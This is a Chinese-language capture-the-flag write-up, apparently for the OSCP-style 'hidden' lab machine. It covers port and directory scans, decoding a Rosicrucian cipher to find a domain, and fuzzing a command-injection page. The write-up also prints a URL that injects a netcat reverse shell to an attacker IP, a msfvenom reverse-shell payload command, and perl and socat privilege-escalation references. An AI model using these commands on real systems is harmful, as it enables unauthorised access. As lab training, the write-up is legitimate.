【OSCP】hidden

admin 2024年8月12日21:05:22评论6 views字数 2911阅读9分42秒阅读模式
【OSCP】hidden

OSCP 靶场

【OSCP】hidden

靶场介绍

hidden

easy

玫瑰十字会密码、域名配置、命令执行、fuzz、perl 提权、本机信息收集、hydra 爆破、socat提权

信息收集

主机发现

【OSCP】hidden

【OSCP】hidden

这里看着像是提示信息,不知道是什么加密符合

【OSCP】hidden

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.238
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 02:42 EST
Nmap scan report for 192.168.1.238
Host is up (0.00084s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
| 256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
|_ 256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Level 1
MAC Address: 08:00:27:82:C5:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.83 ms 192.168.1.238

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds

目录扫描

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.238 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.238/.html (Status: 403) [Size: 278]
http://192.168.1.238/.php (Status: 403) [Size: 278]
http://192.168.1.238/index.html (Status: 200) [Size: 392]
http://192.168.1.238/.php (Status: 403) [Size: 278]
http://192.168.1.238/.html (Status: 403) [Size: 278]
http://192.168.1.238/server-status (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

IP扫描目录并没有什么结果,查看发现,首页的图片是玫瑰十字会的密码

https://www.dcode.fr/chiffre-rose-croix

【OSCP】hidden

根据上面格式的提示,解密后发现是个域名syshiddenhmv

【OSCP】hidden

【OSCP】hidden

成功访问到第二关【OSCP】hidden

重新扫描目录后,好像也没有啥用

【OSCP】hidden

【OSCP】hidden

【OSCP】hidden

再次对二级目录进行扫描发现

【OSCP】hidden

权限获取

通过对loot.php 接口进行模糊测试,发现是个命令执行的页面

 wfuzz -c -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=id --hw 0

【OSCP】hidden

【OSCP】hidden

http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.1.158%202443%20-e%20/bin/bash

【OSCP】hidden

【OSCP】hidden

权限提升

https://gtfobins.github.io/gtfobins/perl/

【OSCP】hidden

sudo 里面可以使用perl ,然后使用perl 进行提权到toreto 用户

【OSCP】hidden

【OSCP】hidden

使用sudo 版本漏洞提权失败

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.158 LPORT=2332 -f elf -o 1.elf

【OSCP】hidden

从atenea 目录下发现存在一个隐藏目录,里面好像放着密码字典

【OSCP】hidden

爆破成功后,登录获取flag

【OSCP】hidden

【OSCP】hidden

【OSCP】hidden

【OSCP】hidden

https://gtfobins.github.io/gtfobins/socat/

【OSCP】hidden

End

“点赞、在看与分享都是莫大的支持”

【OSCP】hidden

【OSCP】hidden

原文始发于微信公众号(贝雷帽SEC):【OSCP】hidden

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日21:05:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】hiddenhttp://cn-sec.com/archives/3055711.html

发表评论

匿名网友 填写信息